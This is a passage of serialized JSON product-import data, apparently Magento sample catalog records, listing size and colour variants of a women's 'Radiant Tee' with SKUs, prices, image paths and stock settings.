",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1501\":{\"sku\":\"WS12-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-M-Orange\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1502\":{\"sku\":\"WS12-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-M-Purple\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1503\":{\"sku\":\"WS12-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-L-Blue\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1504\":{\"sku\":\"WS12-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-L-Orange\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1505\":{\"sku\":\"WS12-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-L-Purple\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1506\":{\"sku\":\"WS12-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-XL-Blue\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1507\":{\"sku\":\"WS12-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-XL-Orange\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1508\":{\"sku\":\"WS12-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-XL-Purple\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1509\":{\"sku\":\"WS12\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Hemp|Organic 